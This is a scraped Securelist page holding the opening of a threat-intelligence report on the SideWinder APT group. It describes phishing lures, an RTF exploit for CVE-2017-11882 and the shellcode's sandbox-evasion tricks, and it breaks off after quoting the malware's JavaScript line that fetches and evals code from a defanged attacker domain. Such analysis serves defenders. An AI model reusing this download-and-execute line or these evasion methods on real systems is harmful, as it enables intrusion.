href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-87747"><figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Compromise Assessment</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-112333"><figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SOC Consulting</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Services</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87751"><a href="https://www.kaspersky.com/enterprise-security/professional-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Professional Services</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87752"><a href="https://www.kaspersky.com/enterprise-security/incident-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Incident Response</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87753"><a href="https://www.kaspersky.com/enterprise-security/cyber-security-training?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Cybersecurity Training</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87755"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87756"><a href="https://www.kaspersky.com/enterprise-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Resource Center</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87757"><a 
href="https://www.kaspersky.com/enterprise-security/resources/case-studies?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Case Studies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87758"><a href="https://www.kaspersky.com/enterprise-security/resources/white-papers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">White Papers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87759"><a href="https://www.kaspersky.com/enterprise-security/resources/data-sheets?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Datasheets</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87760"><a href="https://www.kaspersky.com/enterprise-security/wiki-section/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Technologies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105620"><a href="https://www.kaspersky.com/MITRE?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">MITRE ATT&#038;CK</a> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87761"><a href="https://www.kaspersky.com/about?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">About Us</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105621"><a href="https://www.kaspersky.com/about/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 
data-element-id="nextgen-menu-link">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105622"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105623"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105624"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105626"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Sponsorship</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105627"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105628"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Contacts</a> </ul> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87762"><a href="https://www.kaspersky.com/gdpr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 
data-element-id="nextgen-menu-link">GDPR</a> </ul> </nav> </div> </header> <div class="mobile-menu-wrapper mobile-menu-wrapper--dark"> <ul class="mobile-nav" data-back="Back"> <li class="selector"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="button-link js-modal-open"><i class="font-icons icon-envelope"></i>Subscribe</a> <a href="#" class="button-link c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <a data-element-id="login-button" href="#" class="button-link js-kaspersky-sso-login"><svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg>Login</a> </li> <li class="title"> <span>Securelist menu</span> </li> <li class="parent" data-parent data-icon="top-item"><a data-element-id="lang-selector" href="#" class=""><i class="top-item"></i><span>English</span></a><ul class="submenu"><li class="menu-item"><a href="https://securelist.ru">Russian</a></li><li class="menu-item"><a href="https://securelist.lat">Spanish</a></li></ul> <li class="parent" data-parent="Existing Customers" data-icon="font-icons top-item"><a rel="Existing Customers" href="#"><i class="font-icons top-item"></i><span>Existing Customers</span></a> <ul class="submenu"> <li class="parent" data-parent="Personal" data-icon="top-item"><a rel="Personal" href="#"><i class="top-item"></i><span>Personal</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87860"><a href="https://my.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">My Kaspersky</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105987"><a 
href="https://www.kaspersky.com/renewal-center/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105988"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Update your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105989"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Customer support</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105991"><a href="https://ksos.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">KSOS portal</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105992"><a href="https://cloud.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Business Hub</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105993"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Technical Support</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105994"><a href="https://www.kaspersky.com/small-to-medium-business-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Knowledge Base</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105995"><a 
href="https://www.kaspersky.com/renewal-center/vsb?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew License</a> </ul> </ul> <li class="parent" data-parent="Home" data-icon="font-icons top-item"><a rel="Home" href="#"><i class="font-icons top-item"></i><span>Home</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87778"><a href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Products</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87771"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Trials&#038;Update</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87859"><a href="https://www.kaspersky.com/resource-center?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Resource Center</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112353"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Next</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87776"><a href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Small Business (1-50 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87782"><a 
menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="content-menu-link">All tags</a></li> <li id="menu-item-101956" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="content-menu-link">Webinars</a></li> <li id="menu-item-101126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">APT Logbook</a></li> <li id="menu-item-241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Statistics</a></li> <li id="menu-item-86643" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Encyclopedia</a></li> <li id="menu-item-58141" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Threats descriptions</a></li> <li id="menu-item-111312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-111312"><a href="https://securelist.com/ksb-2023/" data-element-id="content-menu-link">KSB 2023</a></li> </ul> </li> </div> </div> </div> </div> </div> </div> </nav> </section> <section 
class="c-block c-block--spacing-t@md c-block--spacing-b-small@md c-block--divider-internal" style="z-index:10"> <div class="o-container-fluid"> <article class="c-article"> <header class="c-article__header"> <figure class="c-article__figure u-hidden@md"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" data-srcset="" srcset="" /> </figure> <p class="c-article__headline u-hidden@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h1 class="c-article__title">Beyond the Surface: the evolution and expansion of the SideWinder APT group</h1> <div class="c-article__info"> <p class="c-article__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <p class="u-uppercase"><time datetime="2024-10-15T10:00:54+00:00">15 Oct 2024</time></p> <p class="c-article__reading u-ml-auto@md"> <svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-hourglass"></use></svg> <span class="js-reading-time"></span> minute read </p> </div> </header> <div class="c-article__wrapper"> <div class="c-article__main"> <div class="c-highlight c-highlight--overflow-down@md js-accordion u-hidden@md"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img 
src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#infection-vectors">Infection vectors</a></li><li><a href="#rtf-exploit">RTF exploit</a></li><ul class='c-list-links'><li><a href="#initial-infection-lnk">Initial infection LNK</a></li></ul><li><a href="#downloader-module">Downloader module</a></li><li><a href="#moduleinstaller">ModuleInstaller</a></li><li><a href="#backdoor-loader-module">Backdoor loader module</a></li><li><a href="#stealerbot">StealerBot</a></li><ul class='c-list-links'><li><a href="#stealerbot-orchestrator">StealerBot Orchestrator</a></li><li><a href="#modules">Modules</a></li><ul class='c-list-links'><li><a href="#keylogger">Keylogger</a></li><li><a href="#screenshot-grabber">Screenshot Grabber</a></li><li><a href="#file-stealer">File Stealer</a></li><li><a href="#live-console">Live Console</a></li><li><a href="#rdp-credential-stealer">RDP Credential Stealer</a></li><li><a href="#token-grabber">Token Grabber</a></li><li><a href="#credential-phisher">Credential Phisher</a></li><li><a href="#uacbypass">UACBypass</a></li><li><a href="#downloader">Downloader</a></li><ul class='c-list-links'><li><a href="#installers">Installers</a></li><ul class='c-list-links'><li><a href="#installerpayload">InstallerPayload</a></li></ul><li><a href="#installerpayload_net">InstallerPayload_NET</a></li><li><a href="#infrastructure">Infrastructure</a></li></ul><li><a href="#victims">Victims</a></li><li><a href="#attribution">Attribution</a></li></ul></ul><li><a href="#iocs">IOCs</a></li><ul class='c-list-links'><li><a 
href="#malicious-documents">Malicious documents</a></li><li><a href="#rtf">Rtf</a></li><li><a href="#lnk">Lnk</a></li><li><a href="#backdoor-loader">Backdoor Loader</a></li><li><a href="#stealerbot">StealerBot</a></li><li><a href="#syncbotservicehijack-dll">SyncBotServiceHijack.dll</a></li><li><a href="#service-hijack">Service Hijack</a></li><li><a href="#backdoor-loader-devobj-dll">Backdoor Loader devobj.dll</a></li><li><a href="#domains-and-ips">Domains and IPs</a></li></ul> </div> </div> </div> <div class="o-row c-article__container"> <div class="o-col c-article__content js-article-body"> <div class="js-reading-wrapper"> <figure class="c-article__figure u-hidden u-block@md"> <img width="1200" height="600" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-1200x600.jpg" class="attachment-securelist-2020-thumbnail-large size-securelist-2020-thumbnail-large wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-1200x600.jpg" data-srcset="" srcset="" /> </figure> <div class="c-article__authors u-hidden u-block@md"> <p class="c-block__title">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/vasilyberdnikov/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Vasily Berdnikov</span></a> </li> </ul> 
</div> <div class="js-reading-content"> <div class="c-wysiwyg"> <p>SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was first publicly mentioned by us <a href="https://securelist.com/apt-trends-report-q1-2018/85280/" target="_blank" rel="noopener">in 2018</a>. Over the years, the group has launched attacks against high-profile entities in South and Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.</p> <p>Over the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively described in various analyses and reports published by different researchers and vendors (for example, <a href="https://www.bridewell.com/insights/news/detail/the-distinctive-rattle-of-apt-sidewinder" target="_blank" rel="noopener">here</a>, <a href="https://www.embeeresearch.io/advanced-guide-to-infrastructure-analysis-tracking-apt-sidewinder-domains/" target="_blank" rel="noopener">here</a> and <a href="https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html" target="_blank" rel="noopener">here</a>), one of the latest of which was <a href="https://blogs.blackberry.com/en/2024/07/sidewinder-targets-ports-and-maritime-facilities-in-the-mediterranean-sea" target="_blank" rel="noopener">released</a> at the end of July 2024. The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.</p> <p>Despite years of observation and study, knowledge of their post-compromise activities remains limited.</p> <p>During our investigation, we observed new waves of attacks that showed a significant expansion of the group&#8217;s activities. 
The attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also discovered a previously unknown post-exploitation toolkit called &#8220;StealerBot&#8221;, an advanced modular implant designed specifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on targets of interest.</p> <div id="attachment_114127" style="width: 924px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/14065505/SideWinder_2024-01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114127" class="size-full wp-image-114127" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/14065505/SideWinder_2024-01.png" alt="SideWinder's most recent campaign schema" width="914" height="720" /></a><p id="caption-attachment-114127" class="wp-caption-text">SideWinder&#8217;s most recent campaign schema</p></div> <h2 id="infection-vectors">Infection vectors</h2> <p>The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file starts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the StealerBot espionage tool.</p> <p>The documents often contain information obtained from public websites, which is used to lure the victim into opening the file and believing it to be legitimate. 
For example, the file in the image contains data downloaded from the following URL: <a href="https://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil" target="_blank" rel="noopener">https://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil</a></p> <div id="attachment_114128" style="width: 835px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114128" class="size-full wp-image-114128" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02.png" width="825" height="577" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02.png 825w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-300x210.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-768x537.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-500x350.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-740x518.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-400x280.png 400w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-800x560.png 800w" sizes="(max-width: 825px) 100vw, 825px" /></a><p id="caption-attachment-114128" class="wp-caption-text">Snippet of the file 71F11A359243F382779E209687496EE2, &#8220;Nepal Oil Corporation (NOC).docx&#8221;</p></div> <p>The contents of the file are selected specifically for the target and changed depending on the target&#8217;s 
country.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09110021/SideWinder_2024-03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114129" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09110021/SideWinder_2024-03.png" alt="" width="671" height="465" /></a></p> <p>All the documents use the <a href="https://attack.mitre.org/techniques/T1221/" target="_blank" rel="noopener">remote template injection</a> technique to download an RTF file that is stored on a remote server controlled by the attacker.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114130" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04.png" alt="" width="998" height="45" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04.png 998w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-300x14.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-768x35.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-990x45.png 990w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-740x33.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-800x36.png 800w" sizes="(max-width: 998px) 100vw, 998px" /></a></p> <h2 id="rtf-exploit">RTF exploit</h2> <p>RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software.</p> <p>The attacker embedded shellcode designed 
to execute JavaScript code using the &#8220;RunHTMLApplication&#8221; function available in the &#8220;mshtml.dll&#8221; Windows library.</p> <p>The shellcode uses several tricks to evade sandboxes and complicate analysis.</p> <ul> <li>It uses GlobalMemoryStatusEx to determine the amount of installed RAM. If it is less than 2GB, it terminates execution.</li> <li>It uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or AMD, it terminates execution.</li> <li>It attempts to load the &#8220;dotnetlogger32.dll&#8221; library. If the file is present on the system, it terminates execution.</li> </ul> <p>The malware uses different strings to load libraries and functions required for execution. These strings are truncated and the missing part is added at runtime by patching the bytes. The strings are also interleaved with the code, which is arranged to skip over them and jump to valid instructions during execution, making analysis more difficult.</p> <p>The strings are passed as arguments to a function that performs the same action as &#8220;GetProcAddress&#8221;: it gets the address of an exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the name of the exported function.</p> <p>The first argument is passed with the standard push instruction, which loads the library address to the stack. 
The second argument is passed indirectly using a CALL instruction.</p> <div id="attachment_114131" style="width: 786px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114131" class="size-full wp-image-114131" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05.png" alt="Passing necessary arguments" width="776" height="187" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05.png 776w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05-300x72.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05-768x185.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05-740x178.png 740w" sizes="(max-width: 776px) 100vw, 776px" /></a><p id="caption-attachment-114131" class="wp-caption-text">Passing necessary arguments</p></div> <p>The loaded functions are then used to perform the following actions:</p> <ol> <li>Load the &#8220;mshtml.dll&#8221; library and get the pointer to the &#8220;RunHTMLApplication&#8221; function.</li> <li>Get a pointer to the current command line using the &#8220;GetCommandLineW&#8221; function.</li> <li>Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using &#8220;0x12&#8221; as the key.</li> <li>Overwrite the current process command line with the decoded JavaScript.</li> <li>Call the &#8220;RunHTMLApplication&#8221; function, which will execute the code specified in the process command line.</li> </ol> <p>The loaded JavaScript downloads and executes additional script code from a remote website.</p> <div id="crayon-67446d0bc5e1f542589114" 
class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> javascript:eval("v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\", \"hxxps://mofa-gov- sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")</textarea></div> <div class="crayon-main" 